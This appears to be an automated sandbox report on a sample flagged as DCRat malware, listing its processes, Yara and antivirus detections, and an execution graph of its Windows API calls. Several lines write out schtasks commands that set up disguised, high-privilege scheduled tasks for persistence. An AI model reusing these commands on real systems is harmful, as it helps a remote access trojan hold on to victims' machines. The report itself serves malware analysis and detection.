            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:21
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:26
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:28
            Start time:05:07:06
            Start date:24/05/2024
            Path:C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            Wow64 process (32bit):false
            Commandline:"C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Imagebase:0x510000
            File size:1'257'984 bytes
            MD5 hash:A6A0FB77338508B4185FE94263AA2D0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 88%, ReversingLabs
            • Detection: 68%, Virustotal, Browse
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:9.8%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.1%
              Total number of Nodes:1505
              Total number of Limit Nodes:28
              execution_graph 22840 d510d5 22845 d55bd7 22840->22845 22846 d55be1 __EH_prolog 22845->22846 22852 d5b07d 22846->22852 22848 d55bed 22858 d55dcc GetCurrentProcess GetProcessAffinityMask 22848->22858 22853 d5b087 __EH_prolog 22852->22853 22859 d5ea80 80 API calls 22853->22859 22855 d5b099 22860 d5b195 22855->22860 22859->22855 22861 d5b1a7 ___scrt_get_show_window_mode 22860->22861 22864 d60948 22861->22864 22867 d60908 GetCurrentProcess GetProcessAffinityMask 22864->22867 22868 d5b10f 22867->22868 22868->22848 22869 d6ead2 22870 d6eade ___scrt_is_nonwritable_in_current_image 22869->22870 22895 d6e5c7 22870->22895 22872 d6eae5 22874 d6eb0e 22872->22874 22975 d6ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22872->22975 22878 d6eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22874->22878 22906 d7824d 22874->22906 22885 d6ebad 22878->22885 22976 d77243 38 API calls 3 library calls 22878->22976 22879 d6eb2d ___scrt_is_nonwritable_in_current_image 22914 d6f020 22885->22914 22890 d6ebd9 22892 d6ebe2 22890->22892 22977 d7764a 28 API calls _abort 22890->22977 22978 d6e73e 13 API calls 2 library calls 22892->22978 22896 d6e5d0 22895->22896 22979 d6ed5b IsProcessorFeaturePresent 22896->22979 22898 d6e5dc 22980 d72016 22898->22980 22900 d6e5e1 22901 d6e5e5 22900->22901 22989 d780d7 22900->22989 22901->22872 22904 d6e5fc 22904->22872 22909 d78264 22906->22909 22907 d6ec4a DloadUnlock 5 API calls 22908 d6eb27 22907->22908 22908->22879 22910 d781f1 22908->22910 22909->22907 22913 d78220 22910->22913 22911 d6ec4a DloadUnlock 5 API calls 22912 d78249 22911->22912 22912->22878 22913->22911 23126 d6f350 22914->23126 22916 d6f033 GetStartupInfoW 22917 d6ebb3 22916->22917 22918 d7819e 22917->22918 23128 d7b290 22918->23128 22920 d6ebbc 22923 d6d5d4 22920->22923 22922 d781a7 22922->22920 23132 d7b59a 38 API calls 22922->23132 23296 d600cf 22923->23296 22927 d6d5f3 23345 d6a335 22927->23345 22929 d6d5fc 23349 d613b3 GetCPInfo 22929->23349 22931 d6d606 ___scrt_get_show_window_mode 22932 d6d619 GetCommandLineW 22931->22932 22933 d6d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22932->22933 22934 d6d628 22932->22934 23363 d5400a 22933->23363 23352 d6bc84 22934->23352 22940 d6d636 OpenFileMappingW 22944 d6d696 CloseHandle 22940->22944 22945 d6d64f MapViewOfFile 22940->22945 22941 d6d6a0 23357 d6d287 22941->23357 22944->22933 22947 d6d660 __vsnwprintf_l 22945->22947 22948 d6d68d UnmapViewOfFile 22945->22948 22952 d6d287 2 API calls 22947->22952 22948->22944 22954 d6d67c 22952->22954 22953 d68835 8 API calls 22955 d6d76a DialogBoxParamW 22953->22955 22954->22948 22956 d6d7a4 22955->22956 22957 d6d7b6 Sleep 22956->22957 22958 d6d7bd 22956->22958 22957->22958 22960 d6d7cb 22958->22960 23396 d6a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22958->23396 22961 d6d7ea DeleteObject 22960->22961 22962 d6d806 22961->22962 22963 d6d7ff DeleteObject 22961->22963 22964 d6d837 22962->22964 22965 d6d849 22962->22965 22963->22962 23397 d6d2e6 6 API calls 22964->23397 23393 d6a39d 22965->23393 22967 d6d83d CloseHandle 22967->22965 22969 d6d883 22970 d7757e GetModuleHandleW 22969->22970 22971 d6ebcf 22970->22971 22971->22890 22972 d776a7 22971->22972 23648 d77424 22972->23648 22975->22872 22976->22885 22977->22892 22978->22879 22979->22898 22981 d7201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22980->22981 22993 d7310e 22981->22993 22984 d72029 22984->22900 22986 d72031 22987 d7203c 22986->22987 23007 d7314a DeleteCriticalSection 22986->23007 22987->22900 23035 d7b73a 22989->23035 22992 d7203f 8 API calls 3 library calls 22992->22901 22995 d73117 22993->22995 22996 d73140 22995->22996 22997 d72025 22995->22997 23008 d73385 22995->23008 23013 d7314a DeleteCriticalSection 22996->23013 22997->22984 22999 d7215c 22997->22999 23028 d7329a 22999->23028 23001 d72166 23002 d72171 23001->23002 23033 d73348 6 API calls try_get_function 23001->23033 23002->22986 23004 d7217f 23005 d7218c 23004->23005 23034 d7218f 6 API calls ___vcrt_FlsFree 23004->23034 23005->22986 23007->22984 23014 d73179 23008->23014 23011 d733bc InitializeCriticalSectionAndSpinCount 23012 d733a8 23011->23012 23012->22995 23013->22997 23015 d731ad 23014->23015 23019 d731a9 23014->23019 23015->23011 23015->23012 23016 d731cd 23016->23015 23018 d731d9 GetProcAddress 23016->23018 23020 d731e9 __crt_fast_encode_pointer 23018->23020 23019->23015 23019->23016 23021 d73219 23019->23021 23020->23015 23022 d73241 LoadLibraryExW 23021->23022 23026 d73236 23021->23026 23023 d73275 23022->23023 23024 d7325d GetLastError 23022->23024 23023->23026 23027 d7328c FreeLibrary 23023->23027 23024->23023 23025 d73268 LoadLibraryExW 23024->23025 23025->23023 23026->23019 23027->23026 23029 d73179 try_get_function 5 API calls 23028->23029 23030 d732b4 23029->23030 23031 d732cc TlsAlloc 23030->23031 23032 d732bd 23030->23032 23032->23001 23033->23004 23034->23002 23036 d7b757 23035->23036 23037 d7b753 23035->23037 23036->23037 23041 d79e60 23036->23041 23053 d6ec4a 23037->23053 23039 d6e5ee 23039->22904 23039->22992 23042 d79e6c ___scrt_is_nonwritable_in_current_image 23041->23042 23060 d7a3f1 EnterCriticalSection 23042->23060 23044 d79e73 23061 d7bc39 23044->23061 23046 d79e82 23047 d79e91 23046->23047 23074 d79ce9 29 API calls 23046->23074 23076 d79ead LeaveCriticalSection _abort 23047->23076 23050 d79ea2 ___scrt_is_nonwritable_in_current_image 23050->23036 23051 d79e8c 23075 d79d9f GetStdHandle GetFileType 23051->23075 23054 d6ec55 IsProcessorFeaturePresent 23053->23054 23055 d6ec53 23053->23055 23057 d6f267 23054->23057 23055->23039 23125 d6f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23057->23125 23059 d6f34a 23059->23039 23060->23044 23062 d7bc45 ___scrt_is_nonwritable_in_current_image 23061->23062 23063 d7bc52 23062->23063 23064 d7bc69 23062->23064 23085 d7895a 20 API calls __dosmaperr 23063->23085 23077 d7a3f1 EnterCriticalSection 23064->23077 23067 d7bc75 23073 d7bca1 23067->23073 23078 d7bb8a 23067->23078 23068 d7bc57 23086 d78839 26 API calls pre_c_initialization 23068->23086 23072 d7bc61 ___scrt_is_nonwritable_in_current_image 23072->23046 23087 d7bcc8 LeaveCriticalSection _abort 23073->23087 23074->23051 23075->23047 23076->23050 23077->23067 23088 d785a9 23078->23088 23080 d7bba9 23102 d784de 23080->23102 23081 d7bb9c 23081->23080 23095 d7a6ca 23081->23095 23084 d7bbfb 23084->23067 23085->23068 23086->23072 23087->23072 23089 d785b6 _unexpected 23088->23089 23090 d785f6 23089->23090 23091 d785e1 RtlAllocateHeap 23089->23091 23108 d771ad 7 API calls 2 library calls 23089->23108 23109 d7895a 20 API calls __dosmaperr 23090->23109 23091->23089 23093 d785f4 23091->23093 23093->23081 23110 d7a458 23095->23110 23098 d7a70f InitializeCriticalSectionAndSpinCount 23099 d7a6fa 23098->23099 23100 d6ec4a DloadUnlock 5 API calls 23099->23100 23101 d7a726 23100->23101 23101->23081 23103 d78512 __dosmaperr 23102->23103 23104 d784e9 RtlFreeHeap 23102->23104 23103->23084 23104->23103 23105 d784fe 23104->23105 23124 d7895a 20 API calls __dosmaperr 23105->23124 23107 d78504 GetLastError 23107->23103 23108->23089 23109->23093 23111 d7a488 23110->23111 23114 d7a484 23110->23114 23111->23098 23111->23099 23112 d7a4a8 23112->23111 23115 d7a4b4 GetProcAddress 23112->23115 23114->23111 23114->23112 23117 d7a4f4 23114->23117 23116 d7a4c4 __crt_fast_encode_pointer 23115->23116 23116->23111 23118 d7a515 LoadLibraryExW 23117->23118 23119 d7a50a 23117->23119 23120 d7a532 GetLastError 23118->23120 23121 d7a54a 23118->23121 23119->23114 23120->23121 23122 d7a53d LoadLibraryExW 23120->23122 23121->23119 23123 d7a561 FreeLibrary 23121->23123 23122->23121 23123->23119 23124->23107 23125->23059 23127 d6f367 23126->23127 23127->22916 23127->23127 23129 d7b2a2 23128->23129 23130 d7b299 23128->23130 23129->22922 23133 d7b188 23130->23133 23132->22922 23153 d78fa5 GetLastError 23133->23153 23135 d7b195 23173 d7b2ae 23135->23173 23137 d7b19d 23182 d7af1b 23137->23182 23140 d7b1b4 23140->23129 23144 d784de _free 20 API calls 23144->23140 23146 d7b1f2 23206 d7895a 20 API calls __dosmaperr 23146->23206 23148 d7b1f7 23148->23144 23149 d7b20f 23150 d7b23b 23149->23150 23151 d784de _free 20 API calls 23149->23151 23150->23148 23207 d7adf1 26 API calls 23150->23207 23151->23150 23154 d78fc1 23153->23154 23155 d78fbb 23153->23155 23157 d785a9 _unexpected 20 API calls 23154->23157 23160 d79010 SetLastError 23154->23160 23208 d7a61b 11 API calls 2 library calls 23155->23208 23158 d78fd3 23157->23158 23159 d78fdb 23158->23159 23209 d7a671 11 API calls 2 library calls 23158->23209 23162 d784de _free 20 API calls 23159->23162 23160->23135 23164 d78fe1 23162->23164 23163 d78ff0 23163->23159 23165 d78ff7 23163->23165 23166 d7901c SetLastError 23164->23166 23210 d78e16 20 API calls __dosmaperr 23165->23210 23211 d78566 38 API calls _abort 23166->23211 23168 d79002 23171 d784de _free 20 API calls 23168->23171 23172 d79009 23171->23172 23172->23160 23172->23166 23174 d7b2ba ___scrt_is_nonwritable_in_current_image 23173->23174 23175 d78fa5 pre_c_initialization 38 API calls 23174->23175 23176 d7b2c4 23175->23176 23180 d7b348 ___scrt_is_nonwritable_in_current_image 23176->23180 23181 d784de _free 20 API calls 23176->23181 23212 d78566 38 API calls _abort 23176->23212 23213 d7a3f1 EnterCriticalSection 23176->23213 23214 d7b33f LeaveCriticalSection _abort 23176->23214 23180->23137 23181->23176 23215 d73dd6 23182->23215 23185 d7af4e 23187 d7af53 GetACP 23185->23187 23188 d7af65 23185->23188 23186 d7af3c GetOEMCP 23186->23188 23187->23188 23188->23140 23189 d78518 23188->23189 23190 d78556 23189->23190 23195 d78526 _unexpected 23189->23195 23226 d7895a 20 API calls __dosmaperr 23190->23226 23192 d78541 RtlAllocateHeap 23193 d78554 23192->23193 23192->23195 23193->23148 23196 d7b350 23193->23196 23195->23190 23195->23192 23225 d771ad 7 API calls 2 library calls 23195->23225 23197 d7af1b 40 API calls 23196->23197 23198 d7b36f 23197->23198 23201 d7b3c0 IsValidCodePage 23198->23201 23203 d7b376 23198->23203 23205 d7b3e5 ___scrt_get_show_window_mode 23198->23205 23199 d6ec4a DloadUnlock 5 API calls 23200 d7b1ea 23199->23200 23200->23146 23200->23149 23202 d7b3d2 GetCPInfo 23201->23202 23201->23203 23202->23203 23202->23205 23203->23199 23227 d7aff4 GetCPInfo 23205->23227 23206->23148 23207->23148 23208->23154 23209->23163 23210->23168 23213->23176 23214->23176 23216 d73df3 23215->23216 23217 d73de9 23215->23217 23216->23217 23218 d78fa5 pre_c_initialization 38 API calls 23216->23218 23217->23185 23217->23186 23219 d73e14 23218->23219 23223 d790fa 38 API calls __fassign 23219->23223 23221 d73e2d 23224 d79127 38 API calls __fassign 23221->23224 23223->23221 23224->23217 23225->23195 23226->23193 23231 d7b02e 23227->23231 23236 d7b0d8 23227->23236 23230 d6ec4a DloadUnlock 5 API calls 23233 d7b184 23230->23233 23237 d7c099 23231->23237 23233->23203 23235 d7a275 __vswprintf_c_l 43 API calls 23235->23236 23236->23230 23238 d73dd6 __fassign 38 API calls 23237->23238 23239 d7c0b9 MultiByteToWideChar 23238->23239 23241 d7c0f7 23239->23241 23249 d7c18f 23239->23249 23245 d78518 __vswprintf_c_l 21 API calls 23241->23245 23246 d7c118 __vsnwprintf_l ___scrt_get_show_window_mode 23241->23246 23242 d6ec4a DloadUnlock 5 API calls 23243 d7b08f 23242->23243 23251 d7a275 23243->23251 23244 d7c189 23256 d7a2c0 20 API calls _free 23244->23256 23245->23246 23246->23244 23248 d7c15d MultiByteToWideChar 23246->23248 23248->23244 23250 d7c179 GetStringTypeW 23248->23250 23249->23242 23250->23244 23252 d73dd6 __fassign 38 API calls 23251->23252 23253 d7a288 23252->23253 23257 d7a058 23253->23257 23256->23249 23258 d7a073 __vswprintf_c_l 23257->23258 23259 d7a099 MultiByteToWideChar 23258->23259 23260 d7a0c3 23259->23260 23261 d7a24d 23259->23261 23264 d78518 __vswprintf_c_l 21 API calls 23260->23264 23266 d7a0e4 __vsnwprintf_l 23260->23266 23262 d6ec4a DloadUnlock 5 API calls 23261->23262 23263 d7a260 23262->23263 23263->23235 23264->23266 23265 d7a12d MultiByteToWideChar 23267 d7a146 23265->23267 23280 d7a199 23265->23280 23266->23265 23266->23280 23284 d7a72c 23267->23284 23271 d7a170 23274 d7a72c __vswprintf_c_l 11 API calls 23271->23274 23271->23280 23272 d7a1a8 23275 d78518 __vswprintf_c_l 21 API calls 23272->23275 23278 d7a1c9 __vsnwprintf_l 23272->23278 23273 d7a23e 23292 d7a2c0 20 API calls _free 23273->23292 23274->23280 23275->23278 23276 d7a72c __vswprintf_c_l 11 API calls 23279 d7a21d 23276->23279 23278->23273 23278->23276 23279->23273 23281 d7a22c WideCharToMultiByte 23279->23281 23293 d7a2c0 20 API calls _free 23280->23293 23281->23273 23282 d7a26c 23281->23282 23294 d7a2c0 20 API calls _free 23282->23294 23285 d7a458 __dosmaperr 5 API calls 23284->23285 23286 d7a753 23285->23286 23287 d7a75c 23286->23287 23295 d7a7b4 10 API calls 3 library calls 23286->23295 23290 d6ec4a DloadUnlock 5 API calls 23287->23290 23289 d7a79c LCMapStringW 23289->23287 23291 d7a15d 23290->23291 23291->23271 23291->23272 23291->23280 23292->23280 23293->23261 23294->23280 23295->23289 23398 d6e360 23296->23398 23299 d60154 23301 d60484 GetModuleFileNameW 23299->23301 23409 d770dd 42 API calls __vsnwprintf_l 23299->23409 23300 d600f0 GetProcAddress 23302 d60121 GetProcAddress 23300->23302 23303 d60109 23300->23303 23314 d604a3 23301->23314 23302->23299 23305 d60133 23302->23305 23303->23302 23305->23299 23306 d603be 23306->23301 23307 d603c9 GetModuleFileNameW CreateFileW 23306->23307 23308 d603fc SetFilePointer 23307->23308 23309 d60478 CloseHandle 23307->23309 23308->23309 23310 d6040c ReadFile 23308->23310 23309->23301 23310->23309 23312 d6042b 23310->23312 23312->23309 23316 d60085 2 API calls 23312->23316 23315 d604d2 CompareStringW 23314->23315 23317 d60508 GetFileAttributesW 23314->23317 23318 d60520 23314->23318 23400 d5acf5 23314->23400 23403 d60085 23314->23403 23315->23314 23316->23312 23317->23314 23317->23318 23319 d6052a 23318->23319 23321 d60560 23318->23321 23322 d60542 GetFileAttributesW 23319->23322 23324 d6055a 23319->23324 23320 d6066f 23344 d69da4 GetCurrentDirectoryW 23320->23344 23321->23320 23323 d5acf5 GetVersionExW 23321->23323 23322->23319 23322->23324 23325 d6057a 23323->23325 23324->23321 23326 d605e7 23325->23326 23327 d60581 23325->23327 23328 d5400a _swprintf 51 API calls 23326->23328 23329 d60085 2 API calls 23327->23329 23330 d6060f AllocConsole 23328->23330 23331 d6058b 23329->23331 23332 d60667 ExitProcess 23330->23332 23333 d6061c GetCurrentProcessId AttachConsole 23330->23333 23334 d60085 2 API calls 23331->23334 23413 d735b3 23333->23413 23336 d60595 23334->23336 23410 d5ddd1 23336->23410 23340 d5400a _swprintf 51 API calls 23341 d605c3 23340->23341 23342 d5ddd1 53 API calls 23341->23342 23343 d605d2 23342->23343 23343->23332 23344->22927 23346 d60085 2 API calls 23345->23346 23347 d6a349 OleInitialize 23346->23347 23348 d6a36c GdiplusStartup SHGetMalloc 23347->23348 23348->22929 23350 d613d7 IsDBCSLeadByte 23349->23350 23350->23350 23351 d613ef 23350->23351 23351->22931 23353 d6bc8e 23352->23353 23354 d6179d CharUpperW 23353->23354 23355 d6bda4 23353->23355 23438 d5ecad 80 API calls ___scrt_get_show_window_mode 23353->23438 23354->23353 23355->22940 23355->22941 23358 d6e360 23357->23358 23359 d6d294 SetEnvironmentVariableW 23358->23359 23360 d6d2b7 23359->23360 23361 d6d2df 23360->23361 23362 d6d2d3 SetEnvironmentVariableW 23360->23362 23361->22933 23362->23361 23439 d53fdd 23363->23439 23366 d6aded LoadBitmapW 23367 d6ae15 23366->23367 23368 d6ae0e 23366->23368 23370 d6ae2a 23367->23370 23371 d6ae1b GetObjectW 23367->23371 23473 d69e1c FindResourceW 23368->23473 23468 d69d1a 23370->23468 23371->23370 23374 d6ae80 23385 d5d31c 23374->23385 23375 d6ae5c 23487 d69d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23375->23487 23376 d69e1c 12 API calls 23378 d6ae4d 23376->23378 23378->23375 23381 d6ae53 DeleteObject 23378->23381 23379 d6ae64 23488 d69d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23379->23488 23381->23375 23382 d6ae6d 23489 d69f5d 8 API calls ___scrt_get_show_window_mode 23382->23489 23384 d6ae74 DeleteObject 23384->23374 23500 d5d341 23385->23500 23387 d5d328 23540 d5da4e GetModuleHandleW FindResourceW 23387->23540 23390 d68835 23639 d6e24a 23390->23639 23394 d6a3cc GdiplusShutdown OleUninitialize 23393->23394 23394->22969 23396->22960 23397->22967 23399 d600d9 GetModuleHandleW 23398->23399 23399->23299 23399->23300 23401 d5ad09 GetVersionExW 23400->23401 23402 d5ad45 23400->23402 23401->23402 23402->23314 23404 d6e360 23403->23404 23405 d60092 GetSystemDirectoryW 23404->23405 23406 d600aa 23405->23406 23407 d600c8 23405->23407 23408 d600bb LoadLibraryW 23406->23408 23407->23314 23408->23407 23409->23306 23415 d5ddff 23410->23415 23414 d6063d GetStdHandle WriteConsoleW Sleep FreeConsole 23413->23414 23414->23332 23421 d5d28a 23415->23421 23418 d5de22 LoadStringW 23419 d5ddfc 23418->23419 23420 d5de39 LoadStringW 23418->23420 23419->23340 23420->23419 23426 d5d1c3 23421->23426 23423 d5d2a7 23424 d5d2bc 23423->23424 23434 d5d2c8 26 API calls 23423->23434 23424->23418 23424->23419 23427 d5d1de 23426->23427 23433 d5d1d7 _strncpy 23426->23433 23429 d5d202 23427->23429 23435 d61596 WideCharToMultiByte 23427->23435 23432 d5d233 23429->23432 23436 d5dd6b 50 API calls __vsnprintf 23429->23436 23437 d758d9 26 API calls 3 library calls 23432->23437 23433->23423 23434->23424 23435->23429 23436->23432 23437->23433 23438->23353 23440 d53ff4 __vswprintf_c_l 23439->23440 23443 d75759 23440->23443 23446 d73837 23443->23446 23447 d73877 23446->23447 23448 d7385f 23446->23448 23447->23448 23449 d7387f 23447->23449 23463 d7895a 20 API calls __dosmaperr 23448->23463 23451 d73dd6 __fassign 38 API calls 23449->23451 23454 d7388f 23451->23454 23452 d73864 23464 d78839 26 API calls pre_c_initialization 23452->23464 23465 d73da1 20 API calls 2 library calls 23454->23465 23455 d6ec4a DloadUnlock 5 API calls 23457 d53ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23455->23457 23457->23366 23458 d73907 23466 d74186 51 API calls 4 library calls 23458->23466 23461 d73912 23467 d73e59 20 API calls _free 23461->23467 23462 d7386f 23462->23455 23463->23452 23464->23462 23465->23458 23466->23461 23467->23462 23490 d69d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23468->23490 23470 d69d21 23471 d69d2d 23470->23471 23491 d69d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23470->23491 23471->23374 23471->23375 23471->23376 23474 d69e3e SizeofResource 23473->23474 23475 d69e70 23473->23475 23474->23475 23476 d69e52 LoadResource 23474->23476 23475->23367 23476->23475 23477 d69e63 LockResource 23476->23477 23477->23475 23478 d69e77 GlobalAlloc 23477->23478 23478->23475 23479 d69e92 GlobalLock 23478->23479 23480 d69f21 GlobalFree 23479->23480 23481 d69ea1 __vsnwprintf_l 23479->23481 23480->23475 23482 d69f1a GlobalUnlock 23481->23482 23492 d69d7b GdipAlloc 23481->23492 23482->23480 23485 d69eef GdipCreateHBITMAPFromBitmap 23486 d69f05 23485->23486 23486->23482 23487->23379 23488->23382 23489->23384 23490->23470 23491->23471 23493 d69d9a 23492->23493 23494 d69d8d 23492->23494 23493->23482 23493->23485 23493->23486 23496 d69b0f 23494->23496 23497 d69b37 GdipCreateBitmapFromStream 23496->23497 23498 d69b30 GdipCreateBitmapFromStreamICM 23496->23498 23499 d69b3c 23497->23499 23498->23499 23499->23493 23501 d5d34b _wcschr __EH_prolog 23500->23501 23502 d5d37a GetModuleFileNameW 23501->23502 23503 d5d3ab 23501->23503 23504 d5d394 23502->23504 23542 d599b0 23503->23542 23504->23503 23507 d5d407 23553 d75a90 26 API calls 3 library calls 23507->23553 23510 d63781 76 API calls 23512 d5d3db 23510->23512 23511 d5d41a 23554 d75a90 26 API calls 3 library calls 23511->23554 23512->23507 23512->23510 23524 d5d627 23512->23524 23514 d5d563 23514->23524 23579 d59d30 77 API calls 23514->23579 23518 d5d57d ___std_exception_copy 23519 d59bf0 80 API calls 23518->23519 23518->23524 23522 d5d5a6 ___std_exception_copy 23519->23522 23521 d5d42c 23521->23514 23521->23524 23555 d59e40 23521->23555 23570 d59bf0 23521->23570 23578 d59d30 77 API calls 23521->23578 23522->23524 23537 d5d5b2 ___std_exception_copy 23522->23537 23580 d6137a MultiByteToWideChar 23522->23580 23563 d59653 23524->23563 23525 d5d72b 23581 d5ce72 76 API calls 23525->23581 23527 d5da0a 23586 d5ce72 76 API calls 23527->23586 23529 d5d9fa 23529->23387 23530 d5d771 23582 d75a90 26 API calls 3 library calls 23530->23582 23532 d63781 76 API calls 23534 d5d742 23532->23534 23533 d5d78b 23583 d75a90 26 API calls 3 library calls 23533->23583 23534->23530 23534->23532 23536 d61596 WideCharToMultiByte 23536->23537 23537->23524 23537->23525 23537->23527 23537->23529 23537->23536 23584 d5dd6b 50 API calls __vsnprintf 23537->23584 23585 d758d9 26 API calls 3 library calls 23537->23585 23541 d5d32f 23540->23541 23541->23390 23543 d599ba 23542->23543 23544 d59a39 CreateFileW 23543->23544 23545 d59a59 GetLastError 23544->23545 23546 d59aaa 23544->23546 23587 d5b66c 23545->23587 23548 d59ae1 23546->23548 23550 d59ac7 SetFileTime 23546->23550 23548->23512 23549 d59a79 23549->23546 23551 d59a7d CreateFileW GetLastError 23549->23551 23550->23548 23552 d59aa1 23551->23552 